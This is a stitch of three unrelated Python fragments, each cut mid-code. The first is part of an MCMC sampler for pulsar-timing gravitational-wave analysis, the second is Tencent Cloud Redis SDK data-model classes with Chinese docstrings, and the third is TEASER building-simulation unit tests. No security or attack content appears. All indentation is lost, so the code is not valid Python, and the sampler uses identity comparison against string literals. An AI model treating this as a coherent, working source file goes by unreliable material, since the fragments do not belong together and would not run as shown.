Ts[-1] = np.inf
print("Using {0} temperature chains with custom spacing: ".format(n_chain),Ts)
if T_dynamic:
print("Dynamic temperature adjustment: ON")
else:
print("Dynamic temperature adjustment: OFF")
#set up array to hold acceptance probabilities of last PT_hist_length PT swaps
PT_hist = np.ones((n_chain-1,PT_hist_length))*np.nan #initiated with NaNs
PT_hist_idx = np.array([0]) #index to keep track of which row to update in PT_hist
#printitng out the prior used on GWB on/off
if include_gwb:
print("Prior on GWB on/off: {0}%".format(gwb_on_prior*100))
#set up and print out prior on number of wavelets
if max_n_wavelet!=0:
if n_wavelet_prior=='flat':
n_wavelet_prior = np.ones(max_n_wavelet+1)/(max_n_wavelet+1-min_n_wavelet)
for i in range(min_n_wavelet):
n_wavelet_prior[i] = 0.0
else:
n_wavelet_prior = np.array(n_wavelet_prior)
n_wavelet_norm = np.sum(n_wavelet_prior)
n_wavelet_prior *= 1.0/n_wavelet_norm
print("Prior on number of wavelets: ", n_wavelet_prior)
#set up and print out prior on number of glitches
if max_n_glitch!=0:
if n_glitch_prior=='flat':
n_glitch_prior = np.ones(max_n_glitch+1)/(max_n_glitch+1)
else:
n_glitch_prior = np.array(n_glitch_prior)
n_glitch_norm = np.sum(n_glitch_prior)
n_glitch_prior *= 1.0/n_glitch_norm
print("Prior on number of glitches: ", n_glitch_prior)
#setting up array for the samples
num_params = max_n_wavelet*10+max_n_glitch*6
num_params += 2 #for keepeng a record of number of wavelets and glitches
if include_gwb:
num_params += 1
num_per_psr_params = 0
num_noise_params = 0
if vary_white_noise:
num_per_psr_params += num_total_wn_params
num_noise_params += num_total_wn_params
if vary_rn:
num_noise_params += 2
if vary_per_psr_rn:
num_per_psr_params += 2*len(pulsars)
num_noise_params += 2*len(pulsars)
num_params += num_noise_params
print('-'*5)
print(num_params)
print(num_noise_params)
print(num_per_psr_params)
print('-'*5)
if resume_from is not None:
print("Resuming from file: " + resume_from)
npzfile = np.load(resume_from)
swap_record = list(npzfile['swap_record'])
log_likelihood_resume = npzfile['log_likelihood']
betas_resume = npzfile['betas']
PT_acc_resume = npzfile['PT_acc']
samples_resume = npzfile['samples']
N_resume = samples_resume.shape[1]
print("# of samples sucessfully read in: " + str(N_resume))
samples = np.zeros((n_chain, N_resume+N, num_params))
samples[:,:N_resume,:] = np.copy(samples_resume)
log_likelihood = np.zeros((n_chain,N_resume+N))
log_likelihood[:,:N_resume] = np.copy(log_likelihood_resume)
betas = np.ones((n_chain,N_resume+N))
betas[:,:N_resume] = np.copy(betas_resume)
PT_acc = np.zeros((n_chain-1,N_resume+N))
PT_acc[:,:N_resume] = np.copy(PT_acc_resume)
else:
samples = np.zeros((n_chain, N, num_params))
#set up log_likelihood array
log_likelihood = np.zeros((n_chain,N))
#set up betas array with PT inverse temperatures
betas = np.ones((n_chain,N))
#set first row with initial betas
betas[:,0] = 1/Ts
print("Initial beta (1/T) ladder is:\n",betas[:,0])
#set up array holding PT acceptance rate for each iteration
PT_acc = np.zeros((n_chain-1,N))
#filling first sample at all temperatures with last sample of previous run's zero temperature chain (thus it works if n_chain is different)
if start_from is not None:
npzfile = np.load(start_from)
samples_start = npzfile['samples']
for j in range(n_chain):
samples[j,0,:] = np.copy(samples_start[0,-1,:])
#filling first sample with random draw
else:
for j in range(n_chain):
#set up n_wavelet
if n_wavelet_start is 'random':
n_wavelet = np.random.choice( np.arange(min_n_wavelet,max_n_wavelet+1) )
else:
n_wavelet = n_wavelet_start
#set up n_glitch
if n_glitch_start is 'random':
n_glitch = np.random.choice(max_n_glitch+1)
else:
n_glitch = n_glitch_start
samples[j,0,0] = n_wavelet
samples[j,0,1] = n_glitch
if j==0:
print("Starting with n_wavelet=",n_wavelet)
print("Starting with n_glitch=",n_glitch)
if n_wavelet!=0:
#making sure all wavelets get the same sky location and ellipticity
init_cos_gwtheta = ptas[n_wavelet][0][0].params[0].sample()
init_psi = ptas[n_wavelet][0][0].params[1].sample()
init_gwphi = ptas[n_wavelet][0][0].params[2].sample()
for which_wavelet in range(n_wavelet):
samples[j,0,2+0+which_wavelet*10] = init_cos_gwtheta
samples[j,0,2+1+which_wavelet*10] = init_psi
samples[j,0,2+2+which_wavelet*10] = init_gwphi
#randomly pick other wavelet parameters separately fo each wavelet
samples[j,0,2+3+which_wavelet*10:2+10+which_wavelet*10] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[3:10])
if n_glitch!=0:
for which_glitch in range(n_glitch):
samples[j,0,2+10*max_n_wavelet+which_glitch*6:2+10*max_n_wavelet+6+which_glitch*6] = np.hstack(p.sample() for p in ptas[0][n_glitch][0].params[:6])
if vary_white_noise and not vary_per_psr_rn:
if efac_start is not None:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+num_total_wn_params] = np.ones(num_total_wn_params)*efac_start
else:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+num_total_wn_params] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+num_total_wn_params])
elif vary_per_psr_rn and not vary_white_noise:
if per_psr_rn_start_file==None:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+2*len(pulsars)])
else:
RN_noise_data = np.load(per_psr_rn_start_file)
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)] = RN_noise_data['RN_start']
elif vary_per_psr_rn and vary_white_noise: #vary both per psr RN and WN
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)+num_total_wn_params] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+2*len(pulsars)+num_total_wn_params])
if vary_rn:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6+num_per_psr_params:2+max_n_wavelet*10+max_n_glitch*6+num_noise_params] = np.array([ptas[n_wavelet][0][0].params[n_wavelet*10+num_noise_params-2].sample(), ptas[n_wavelet][0][0].params[n_wavelet*10+num_noise_params-1].sample()])
if include_gwb:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6+num_noise_params] = ptas[n_wavelet][0][1].params[n_wavelet*10+num_noise_params].sample()
#printing info about initial parameters
for j in range(n_chain):
print(j)
print(samples[j,0,:])
n_wavelet = get_n_wavelet(samples, j, 0)
n_glitch = get_n_glitch(samples, j, 0)
if include_gwb:
gwb_on = get_gwb_on(samples, j, 0, max_n_wavelet, max_n_glitch, num_noise_params)
else:
gwb_on = 0
first_sample = strip_samples(samples, j, 0, n_wavelet, max_n_wavelet, n_glitch, max_n_glitch)
print(first_sample)
log_likelihood[j,0] = ptas[n_wavelet][n_glitch][gwb_on].get_lnlikelihood(first_sample)
print(log_likelihood[j,0])
print(ptas[n_wavelet][n_glitch][gwb_on].get_lnprior(first_sample))
#setting up array for the fisher eigenvalues
#one for wavelet parameters which we will keep updating
eig = np.ones((n_chain, max_n_wavelet, 10, 10))*0.1
#also one for the glitch parameters
eig_glitch = np.ones((n_chain, max_n_glitch, 6, 6))*0.03
#one for GWB and common rn parameters, which we will keep updating
if include_gwb:
eig_gwb_rn = np.broadcast_to( np.array([[1.0,0,0], [0,0.3,0], [0,0,0.3]]), (n_chain, 3, 3)).copy()
else:
eig_gwb_rn = np.broadcast_to( np.array([[1.0,0], [0,0.3]]), (n_chain, 2, 2)).copy()
#and one for white noise parameters, which we will also keep updating
eig_per_psr = np.broadcast_to(np.eye(num_per_psr_params)*0.1, (n_chain, num_per_psr_params, num_per_psr_params) ).copy()
#calculate wn eigenvectors
for j in range(n_chain):
n_wavelet = get_n_wavelet(samples, j, 0)
n_glitch = get_n_glitch(samples, j, 0)
per_psr_eigvec = get_fisher_eigenvectors(strip_samples(samples, j, 0, n_wavelet, max_n_wavelet, n_glitch, max_n_glitch), ptas[n_wavelet][0][0], T_chain=1/betas[j,0], n_wavelet=1, dim=num_per_psr_params, offset=n_wavelet*10+n_glitch*6)
eig_per_psr[j,:,:] = per_psr_eigvec[0,:,:]
#read in tau_scan data if we will need it
if tau_scan_proposal_weight+RJ_weight>0:
if tau_scan_file==None:
raise Exception("tau-scan data file is needed for tau-scan global propsals")
with open(tau_scan_file, 'rb') as f:
tau_scan_data = pickle.load(f)
print("Tau-scan data read in successfully!")
tau_scan = tau_scan_data['tau_scan']
print(len(tau_scan))
TAU_list = list(tau_scan_data['tau_edges'])
F0_list = tau_scan_data['f0_edges']
T0_list = tau_scan_data['t0_edges']
#check if same prior range was used
log_f0_max = float(ptas[-1][-1][-1].params[3]._typename.split('=')[2][:-1])
log_f0_min = float(ptas[-1][-1][-1].params[3]._typename.split('=')[1].split(',')[0])
t0_max = float(ptas[-1][-1][-1].params[8]._typename.split('=')[2][:-1])
t0_min = float(ptas[-1][-1][-1].params[8]._typename.split('=')[1].split(',')[0])
tau_max = float(ptas[-1][-1][-1].params[9]._typename.split('=')[2][:-1])
tau_min = float(ptas[-1][-1][-1].params[9]._typename.split('=')[1].split(',')[0])
print("#"*70)
print("Tau-scan and MCMC prior range check (they must be the same)")
print("tau_min: ", TAU_list[0], tau_min)
print("tau_max: ", TAU_list[-1], tau_max)
print("t0_min: ", T0_list[0][0]/3600/24/365.25, t0_min)
print("t0_max: ", T0_list[0][-1]/3600/24/365.25, t0_max)
print("f0_min: ", F0_list[0][0], 10**log_f0_min)
print("f0_max: ", F0_list[0][-1], 10**log_f0_max)
print("#"*70)
#normalization
norm = 0.0
for idx, TTT in enumerate(tau_scan):
for kk in range(TTT.shape[0]):
for ll in range(TTT.shape[1]):
df = np.log10(F0_list[idx][kk+1]/F0_list[idx][kk])
dt = (T0_list[idx][ll+1]-T0_list[idx][ll])/3600/24/365.25
dtau = (TAU_list[idx+1]-TAU_list[idx])
norm += TTT[kk,ll]*df*dt*dtau
tau_scan_data['norm'] = norm #TODO: Implement some check to make sure this is normalized over the same range as the prior range used in the MCMC
print(norm)
#read in glitch_tau_scan data if we will need it
if glitch_tau_scan_proposal_weight+glitch_RJ_weight>0:
if glitch_tau_scan_file==None:
raise Exception("glitch-tau-scan data file is needed for glitch model tau-scan global propsals")
with open(glitch_tau_scan_file, 'rb') as f:
glitch_tau_scan_data = pickle.load(f)
print("Glitch tau-scan data read in successfully!")
TAU_list = list(glitch_tau_scan_data['tau_edges'])
F0_list = glitch_tau_scan_data['f0_edges']
T0_list = glitch_tau_scan_data['t0_edges']
#check if same prior range was used
log_f0_max = float(ptas[-1][-1][-1].params[3]._typename.split('=')[2][:-1])
log_f0_min = float(ptas[-1][-1][-1].params[3]._typename.split('=')[1].split(',')[0])
t0_max = float(ptas[-1][-1][-1].params[8]._typename.split('=')[2][:-1])
t0_min = float(ptas[-1][-1][-1].params[8]._typename.split('=')[1].split(',')[0])
tau_max = float(ptas[-1][-1][-1].params[9]._typename.split('=')[2][:-1])
tau_min = float(ptas[-1][-1][-1].params[9]._typename.split('=')[1].split(',')[0])
print("#"*70)
print("Glitch tau--scan and MCMC prior range check (they must be the same)")
print("tau_min: ", TAU_list[0], tau_min)
print("tau_max: ", TAU_list[-1], tau_max)
print("t0_min: ", T0_list[0][0]/3600/24/365.25, t0_min)
print("t0_max: ", T0_list[0][-1]/3600/24/365.25, t0_max)
print("f0_min: ", F0_list[0][0], 10**log_f0_min)
print("f0_max: | |
:type ParamName: str
:param ValueType: 参数类型:integer
:type ValueType: str
:param NeedRestart: 修改后是否需要重启:true,false
:type NeedRestart: str
:param DefaultValue: 参数默认值
:type DefaultValue: str
:param CurrentValue: 当前运行参数值
:type CurrentValue: str
:param Tips: 参数说明
:type Tips: str
:param Min: 参数最小值
:type Min: str
:param Max: 参数最大值
:type Max: str
:param Status: 参数状态, 1: 修改中, 2:修改完成
:type Status: int
:param Unit: 参数单位
注意:此字段可能返回 null,表示取不到有效值。
:type Unit: str
"""
self.ParamName = None
self.ValueType = None
self.NeedRestart = None
self.DefaultValue = None
self.CurrentValue = None
self.Tips = None
self.Min = None
self.Max = None
self.Status = None
self.Unit = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.ValueType = params.get("ValueType")
self.NeedRestart = params.get("NeedRestart")
self.DefaultValue = params.get("DefaultValue")
self.CurrentValue = params.get("CurrentValue")
self.Tips = params.get("Tips")
self.Min = params.get("Min")
self.Max = params.get("Max")
self.Status = params.get("Status")
self.Unit = params.get("Unit")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceMultiParam(AbstractModel):
"""实例多选项类型参数描述
"""
def __init__(self):
"""
:param ParamName: 参数名
:type ParamName: str
:param ValueType: 参数类型:multi
:type ValueType: str
:param NeedRestart: 修改后是否需要重启:true,false
:type NeedRestart: str
:param DefaultValue: 参数默认值
:type DefaultValue: str
:param CurrentValue: 当前运行参数值
:type CurrentValue: str
:param Tips: 参数说明
:type Tips: str
:param EnumValue: 参数说明
:type EnumValue: list of str
:param Status: 参数状态, 1: 修改中, 2:修改完成
:type Status: int
"""
self.ParamName = None
self.ValueType = None
self.NeedRestart = None
self.DefaultValue = None
self.CurrentValue = None
self.Tips = None
self.EnumValue = None
self.Status = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.ValueType = params.get("ValueType")
self.NeedRestart = params.get("NeedRestart")
self.DefaultValue = params.get("DefaultValue")
self.CurrentValue = params.get("CurrentValue")
self.Tips = params.get("Tips")
self.EnumValue = params.get("EnumValue")
self.Status = params.get("Status")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceNode(AbstractModel):
"""实例节点
"""
def __init__(self):
"""
:param Id: Id
:type Id: int
:param InstanceClusterNode: 节点详细信息
:type InstanceClusterNode: list of InstanceClusterNode
"""
self.Id = None
self.InstanceClusterNode = None
def _deserialize(self, params):
self.Id = params.get("Id")
if params.get("InstanceClusterNode") is not None:
self.InstanceClusterNode = []
for item in params.get("InstanceClusterNode"):
obj = InstanceClusterNode()
obj._deserialize(item)
self.InstanceClusterNode.append(obj)
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceParam(AbstractModel):
"""实例参数
"""
def __init__(self):
"""
:param Key: 设置参数的名字
:type Key: str
:param Value: 设置参数的值
:type Value: str
"""
self.Key = None
self.Value = None
def _deserialize(self, params):
self.Key = params.get("Key")
self.Value = params.get("Value")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceParamHistory(AbstractModel):
"""实例参数修改历史
"""
def __init__(self):
"""
:param ParamName: 参数名称
:type ParamName: str
:param PreValue: 修改前值
:type PreValue: str
:param NewValue: 修改后值
:type NewValue: str
:param Status: 状态:1-参数配置修改中;2-参数配置修改成功;3-参数配置修改失败
:type Status: int
:param ModifyTime: 修改时间
:type ModifyTime: str
"""
self.ParamName = None
self.PreValue = None
self.NewValue = None
self.Status = None
self.ModifyTime = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.PreValue = params.get("PreValue")
self.NewValue = params.get("NewValue")
self.Status = params.get("Status")
self.ModifyTime = params.get("ModifyTime")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceProxySlowlogDetail(AbstractModel):
"""代理慢查询详情
"""
def __init__(self):
"""
:param Duration: 慢查询耗时
:type Duration: int
:param Client: 客户端地址
:type Client: str
:param Command: 命令
:type Command: str
:param CommandLine: 详细命令行信息
:type CommandLine: str
:param ExecuteTime: 执行时间
:type ExecuteTime: str
"""
self.Duration = None
self.Client = None
self.Command = None
self.CommandLine = None
self.ExecuteTime = None
def _deserialize(self, params):
self.Duration = params.get("Duration")
self.Client = params.get("Client")
self.Command = params.get("Command")
self.CommandLine = params.get("CommandLine")
self.ExecuteTime = params.get("ExecuteTime")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceSecurityGroupDetail(AbstractModel):
"""实例安全组信息
"""
def __init__(self):
"""
:param InstanceId: 实例Id
:type InstanceId: str
:param SecurityGroupDetails: 安全组信息
:type SecurityGroupDetails: list of SecurityGroupDetail
"""
self.InstanceId = None
self.SecurityGroupDetails = None
def _deserialize(self, params):
self.InstanceId = params.get("InstanceId")
if params.get("SecurityGroupDetails") is not None:
self.SecurityGroupDetails = []
for item in params.get("SecurityGroupDetails"):
obj = SecurityGroupDetail()
obj._deserialize(item)
self.SecurityGroupDetails.append(obj)
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set), Warning)
class InstanceSet(AbstractModel):
"""实例详细信息列表
"""
def __init__(self):
"""
:param InstanceName: 实例名称
:type InstanceName: str
:param InstanceId: 实例Id
:type InstanceId: str
:param Appid: 用户的Appid
:type Appid: int
:param ProjectId: 项目Id
:type ProjectId: int
:param RegionId: 地域id 1--广州 4--上海 5-- 中国香港 6--多伦多 7--上海金融 8--北京 9-- 新加坡 11--深圳金融 15--美西(硅谷)16--成都 17--德国 18--韩国 19--重庆 21--印度 22--美东(弗吉尼亚)23--泰国 24--俄罗斯 25--日本
:type RegionId: int
:param ZoneId: 区域id
:type ZoneId: int
:param VpcId: vpc网络id 如:75101
:type VpcId: int
:param SubnetId: vpc网络下子网id 如:46315
:type SubnetId: int
:param Status: 实例当前状态,0:待初始化;1:实例在流程中;2:实例运行中;-2:实例已隔离;-3:实例待删除
:type Status: int
:param WanIp: 实例vip
:type WanIp: str
:param Port: 实例端口号
:type Port: int
:param Createtime: 实例创建时间
:type Createtime: str
:param Size: 实例容量大小,单位:MB
:type Size: float
:param SizeUsed: 该字段已废弃
:type SizeUsed: float
:param Type: 实例类型:1 – Redis2.8内存版(集群架构),2 – Redis2.8内存版(标准架构),3 – CKV 3.2内存版(标准架构),4 – CKV 3.2内存版(集群架构),5 – Redis2.8内存版(单机),6 – Redis4.0内存版(标准架构),7 – Redis4.0内存版(集群架构),8 – Redis5.0内存版(标准架构),9 – Redis5.0内存版(集群架构)
:type Type: int
:param AutoRenewFlag: 实例是否设置自动续费标识,1:设置自动续费;0:未设置自动续费
:type AutoRenewFlag: int
:param DeadlineTime: 实例到期时间
:type DeadlineTime: str
:param Engine: 引擎:社区版Redis、腾讯云CKV
:type Engine: str
:param ProductType: 产品类型:standalone – 标准版,cluster – 集群版
:type ProductType: str
:param UniqVpcId: vpc网络id 如:vpc-fk33jsf43kgv
:type UniqVpcId: str
:param UniqSubnetId: vpc网络下子网id 如:subnet-fd3j6l35mm0
:type UniqSubnetId: str
:param BillingMode: 计费模式:0-按量计费,1-包年包月
:type BillingMode: int
:param InstanceTitle: 实例运行状态描述:如”实例运行中“
:type InstanceTitle: str
:param OfflineTime: 计划下线时间
:type OfflineTime: str
:param SubStatus: 流程中的实例,返回子状态
:type SubStatus: int
:param Tags: 反亲和性标签
:type Tags: list of str
:param InstanceNode: 实例节点信息
:type InstanceNode: list of InstanceNode
:param RedisShardSize: 分片大小
:type RedisShardSize: int
:param RedisShardNum: 分片数量
:type RedisShardNum: int
:param RedisReplicasNum: 副本数量
:type RedisReplicasNum: int
:param PriceId: 计费Id
:type PriceId: int
:param CloseTime: 隔离时间
:type CloseTime: str
:param SlaveReadWeight: 从节点读取权重
:type SlaveReadWeight: int
:param InstanceTags: 实例关联的标签信息
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceTags: list of InstanceTagInfo
:param ProjectName: 项目名称
注意:此字段可能返回 null,表示取不到有效值。
:type ProjectName: str
:param NoAuth: 是否为免密实例,true-免密实例;false-非免密实例
注意:此字段可能返回 null,表示取不到有效值。
:type NoAuth: bool
:param ClientLimit: 客户端连接数
注意:此字段可能返回 null,表示取不到有效值。
:type ClientLimit: int
:param DtsStatus: DTS状态(内部参数,用户可忽略)
注意:此字段可能返回 null,表示取不到有效值。
:type DtsStatus: int
:param NetLimit: 分片带宽上限,单位MB
注意:此字段可能返回 null,表示取不到有效值。
:type NetLimit: int
:param PasswordFree: 免密实例标识(内部参数,用户可忽略)
注意:此字段可能返回 null,表示取不到有效值。
:type PasswordFree: int
:param ReadOnly: 实例只读标识(内部参数,用户可忽略)
注意:此字段可能返回 null,表示取不到有效值。
:type ReadOnly: int
:param Vip6: 内部参数,用户可忽略
注意:此字段可能返回 null,表示取不到有效值。
:type Vip6: str
:param RemainBandwidthDuration: 内部参数,用户可忽略
注意:此字段可能返回 null,表示取不到有效值。
:type RemainBandwidthDuration: str
:param DiskSize: Tendis实例的磁盘大小
注意:此字段可能返回 null,表示取不到有效值。
:type DiskSize: int
:param MonitorVersion: 监控版本: 1m-分钟粒度监控,5s-5秒粒度监控
注意:此字段可能返回 null,表示取不到有效值。
:type MonitorVersion: str
:param ClientLimitMin: 客户端最大连接数可设置的最小值
注意:此字段可能返回 null,表示取不到有效值。
:type ClientLimitMin: int
:param ClientLimitMax: 客户端最大连接数可设置的最大值
注意:此字段可能返回 null,表示取不到有效值。
:type ClientLimitMax: int
:param NodeSet: 实例的节点详细信息
注意:此字段可能返回 null,表示取不到有效值。
:type NodeSet: list of RedisNodeInfo
:param Region: 实例所在的地域信息,比如ap-guangzhou
注意:此字段可能返回 null,表示取不到有效值。
:type Region: str
"""
self.InstanceName = None
self.InstanceId = None
self.Appid = None
self.ProjectId = None
self.RegionId = None
self.ZoneId = None
self.VpcId = None
self.SubnetId = None
self.Status = None
self.WanIp = None
self.Port = None
self.Createtime = None
self.Size = None
self.SizeUsed = None
self.Type = None
self.AutoRenewFlag = None
self.DeadlineTime = None
self.Engine = None
self.ProductType = None
self.UniqVpcId = None
self.UniqSubnetId = None
self.BillingMode = None
self.InstanceTitle = None
self.OfflineTime = None
self.SubStatus = None
self.Tags = None
self.InstanceNode = None
self.RedisShardSize = None
self.RedisShardNum = None
self.RedisReplicasNum = None
self.PriceId = None
self.CloseTime = None
self.SlaveReadWeight = None
self.InstanceTags = None
self.ProjectName = None
self.NoAuth = None
self.ClientLimit = None
self.DtsStatus = None
self.NetLimit = None
self.PasswordFree = None
self.ReadOnly = None
self.Vip6 = None
self.RemainBandwidthDuration = None
self.DiskSize = None
self.MonitorVersion = None
self.ClientLimitMin = None
self.ClientLimitMax = None
self.NodeSet = None
self.Region = None
def _deserialize(self, params):
self.InstanceName = params.get("InstanceName")
self.InstanceId = params.get("InstanceId")
self.Appid = params.get("Appid")
self.ProjectId = params.get("ProjectId")
self.RegionId = params.get("RegionId")
self.ZoneId = params.get("ZoneId")
self.VpcId = params.get("VpcId")
self.SubnetId = params.get("SubnetId")
self.Status = params.get("Status")
self.WanIp = params.get("WanIp")
self.Port = params.get("Port")
self.Createtime = params.get("Createtime")
self.Size = params.get("Size")
self.SizeUsed = params.get("SizeUsed")
self.Type = params.get("Type")
self.AutoRenewFlag = params.get("AutoRenewFlag")
self.DeadlineTime = params.get("DeadlineTime")
self.Engine = params.get("Engine")
self.ProductType = params.get("ProductType")
self.UniqVpcId = params.get("UniqVpcId")
self.UniqSubnetId = params.get("UniqSubnetId")
self.BillingMode = params.get("BillingMode")
self.InstanceTitle = params.get("InstanceTitle")
self.OfflineTime = params.get("OfflineTime")
self.SubStatus | |
def test_type_bldg_residential_with_calc(self):
"""
Verification of the type building generation of an office building.
Values are compared with TEASER3 values.
"""
from teaser.logic.archetypebuildings.bmvbs.singlefamilydwelling \
import SingleFamilyDwelling
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500)
test_residential.generate_archetype()
# general parameters
assert len(test_residential.thermal_zones) == 1
# zone specific parameters
for zone in test_residential.thermal_zones:
if zone.name == "SingleDwelling":
assert zone.area == 2500
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 1108
assert round(test_residential.get_outer_wall_area(-1), 0) == 1108
assert round(test_residential.get_outer_wall_area(0), 0) == 312
assert round(test_residential.get_outer_wall_area(180), 0) == 312
assert round(test_residential.get_outer_wall_area(90), 0) == 312
assert round(test_residential.get_outer_wall_area(270), 0) == 312
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=1,
neighbour_buildings=1,
attic=1,
dormer=1,
cellar=1,
construction_type="light")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 1108
assert round(test_residential.get_outer_wall_area(-1), 0) == 1108
assert round(test_residential.get_outer_wall_area(0), 0) == 393
assert round(test_residential.get_outer_wall_area(180), 0) == 393
assert round(test_residential.get_outer_wall_area(90), 0) == 393
assert round(test_residential.get_outer_wall_area(270), 0) == 393
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=0,
neighbour_buildings=2,
attic=2,
dormer=0,
cellar=2,
construction_type="heavy")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 858
assert round(test_residential.get_outer_wall_area(-1), 0) == 484
assert round(test_residential.get_outer_wall_area(0), 0) == 267
assert round(test_residential.get_outer_wall_area(180), 0) == 267
assert round(test_residential.get_outer_wall_area(90), 0) == 267
assert round(test_residential.get_outer_wall_area(270), 0) == 267
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=0,
neighbour_buildings=2,
attic=3,
dormer=0,
cellar=3,
construction_type="light")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 700
assert round(test_residential.get_outer_wall_area(-1), 0) == 789
assert round(test_residential.get_outer_wall_area(0), 0) == 251
assert round(test_residential.get_outer_wall_area(180), 0) == 251
assert round(test_residential.get_outer_wall_area(90), 0) == 251
assert round(test_residential.get_outer_wall_area(270), 0) == 251
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
# methods in Project, these tests only test if the API function works,
# not if it produces reliable results.
def test_load_save_project(self):
"""test of load_project and save_project"""
prj.load_project(utilities.get_full_path(("examples/examplefiles"
"/new.teaserXML")))
therm_zone = prj.buildings[-1].thermal_zones[0]
assert therm_zone.outer_walls[0].area == 40.0
tz_area = sum([tz.area for tz in prj.buildings[
-1].thermal_zones])
assert prj.buildings[-1].net_leased_area == tz_area
prj.save_project(file_name="unitTest", path=None)
prj.save_project(file_name=None, path=utilities.get_default_path())
prj.set_default()
def test_save_citygml(self):
"""test of save_gml"""
helptest.building_test2(prj)
prj.save_citygml(file_name="unitTest", path=None)
prj.save_citygml(file_name=None, path=utilities.get_default_path())
prj.set_default()
def test_load_citygml(self):
"""test of load_gml"""
prj.set_default()
prj.load_citygml(utilities.get_full_path(
"examples/examplefiles/CityGMLSample.gml"))
def test_calc_all_buildings(self):
"""test of calc_all_buildings, no calculation verification"""
helptest.building_test2(prj)
helptest.building_test2(prj)
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings(raise_errors=True)
def test_retrofit_all_buildings(self):
"""test of retrofit_all_buildings, no calculation verification"""
prj.add_residential(
method='iwu',
usage='single_family_dwelling',
name="ResidentialBuilding",
year_of_construction=1858,
number_of_floors=2,
height_of_floors=3.2,
net_leased_area=219)
prj.add_residential(
method='tabula_de',
usage='single_family_house',
name="ResidentialBuilding",
year_of_construction=1858,
number_of_floors=2,
height_of_floors=3.2,
net_leased_area=219)
prj.retrofit_all_buildings(
year_of_retrofit=2015,
type_of_retrofit='retrofit')
def test_export_aixlib(self):
"""test of export_aixlib, no calculation verification"""
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
